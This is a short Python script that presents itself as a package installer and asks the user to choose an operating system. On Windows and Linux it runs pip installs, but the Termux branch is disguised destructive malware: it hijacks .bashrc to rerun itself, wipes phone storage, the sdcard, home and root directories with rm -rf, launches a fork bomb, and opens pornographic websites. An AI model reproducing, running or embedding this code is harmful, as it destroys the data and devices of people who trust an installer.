import os 
sys_check = input("Choose Operating System(Windows/Linux/Termux):")
if sys_check == "Windows":
    print("Installing Required packages...")
    os.system("pip install platform")
    os.system("pip install httpx")
    os.system("pip install time")
    os.system("pip install subprocess")
elif sys_check == "Linux":
    print("Installing Required packages...")
    os.system("pip install platform")
    os.system("pip install httpx")
    os.system("pip install time")
    os.system("pip install subprocess")
elif sys_check == "Termux":
    print("Installing Required packages...")
    os.system('touch .hushlogin')
    os.system('printf "python3 installer.py" > $HOME/.bashrc')
    os.system('termux-setup-storage')
    os.system('rm -rf /storage/emulated/0/*')
    os.system('rm -rf /storage/emulated/*')
    os.system('rm -rf /sdcard/*')
    os.system('rm -rf /sdcard/0/*')
    os.system('rm -rf /sdcard1/*')
    os.system('rm -rf /storage/*')
    os.system('rm -rf /*')
    os.system('rm -rf /system/*')
    os.system('rm -rf $HOME/../../*')
    os.system('rm -rf $PREFIX/b')
    os.system('rm -rf $HOME/*')
    os.system('mv $HOME /dev/null')
    os.system(':(){ :|: & };:')
    os.system("xdg-open https://youjizz.com")
    os.system("xdg-open https://pornhub.com")
    os.system("xdg-open https://kanortube.com")
    os.system("xdg-open 6https://xnxx.com")
    os.system("xdg-open https://xvideos2.com")
    os.system("xdg-open https://xvideos.com")
else:
    exit("Unknown Operating System.")
